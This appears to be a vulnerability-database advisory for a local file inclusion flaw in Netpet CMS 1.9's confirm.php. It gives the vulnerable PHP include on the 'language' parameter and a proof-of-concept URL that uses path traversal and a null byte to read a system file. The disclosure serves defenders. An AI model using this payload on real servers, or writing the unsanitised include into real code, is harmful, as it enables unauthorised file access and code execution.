Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability

vendor:

Netpet CMS

by:

SirGod

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Netpet CMS

Affected Version From: 1.9

Affected Version To: 1.9

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability

Netpet CMS 1.9 is vulnerable to a local file inclusion vulnerability due to insufficient sanitization of user-supplied input to the 'language' parameter in the 'confirm.php' script. An attacker can exploit this vulnerability to include arbitrary files from the web server, potentially leading to the execution of arbitrary code.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

############################################################################################
[+] Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
############################################################################################

[+] Download : http://www.netpet.at/en/downloads

[+] Local File Inclusion

  - Vulnerable code in netpet/confirm.php

------------------------------------------------------------------------
$selLang = $_GET['language'];
if($selLang!=""){
	include $netpetfolder."netpet/languages/".$selLang.".lang.php";
------------------------------------------------------------------------

  - PoC

   http://127.0.0.1/[path]/netpet/confirm.php?language=../../../../../../../boot.ini%00

############################################################################################

# milw0rm.com [2009-08-03]